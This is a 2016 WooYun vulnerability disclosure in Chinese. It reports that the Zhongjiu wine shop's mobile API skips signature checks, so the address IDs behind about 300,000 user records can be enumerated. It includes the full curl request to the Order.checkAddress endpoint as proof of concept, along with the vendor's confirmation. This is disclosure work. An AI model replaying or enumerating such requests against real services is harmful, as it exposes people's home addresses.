当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0192242

漏洞标题:中酒网某漏洞导致30W用户地址泄漏

相关厂商:中酒时代酒业(北京)有限公司

漏洞作者: 路人甲

提交时间:2016-04-03 22:24

修复时间:2016-05-20 09:50

公开时间:2016-05-20 09:50

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-03: 细节已通知厂商并且等待厂商处理中
2016-04-05: 厂商已经确认,细节仅向厂商公开
2016-04-15: 细节向核心白帽子及相关领域专家公开
2016-04-25: 细节向普通白帽子公开
2016-05-05: 细节向实习白帽子公开
2016-05-20: 细节向公众公开

简要描述:

中酒网某漏洞导致30W用户地址泄漏

详细说明:

http://pro.zhongjiu.cn/20141209/shouji/shouji.html
下载 APP我用户iPhone
注册登录,去买酒

D4871881FA0A780A112248A65D0B5A34.png


修改一下地址
看一下这时的接口
curl -H "Host: api1.zhongjiu.cn" -H "Content-Type: application/x-www-form-urlencoded charset=utf-8" -H "Accept-Language: zh-cn" -H "Accept: */*" -H "User-Agent: ZJW/4.2.7 CFNetwork/758.2.8 Darwin/15.0.0" --data-binary "sitetype=1&userId=3160600&appversion=4.2.7&charset=utf-8&mobileversion=9.2.1&sign=f25d843d8b9a88faccf562d4498dd236843&version=3&OrderChannelPlat=1&mobilesize=iPod_Touch_5&addressid=362500" --compressed http://api1.zhongjiu.cn/Order.checkAddress

屏幕快照 2016-04-03 下午9.37.58.png


这个接口 看似有签名验证,实际上并没有签名,可以直接修改后遍历
共36W很容易遍历

漏洞证明:

C25E015E0329F034963303F0F576C359.png


屏幕快照 2016-04-03 下午9.39.09.png


屏幕快照 2016-04-03 下午9.40.21.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-04-05 09:44

厂商回复:

多谢,我们会尽快修复

最新状态:

暂无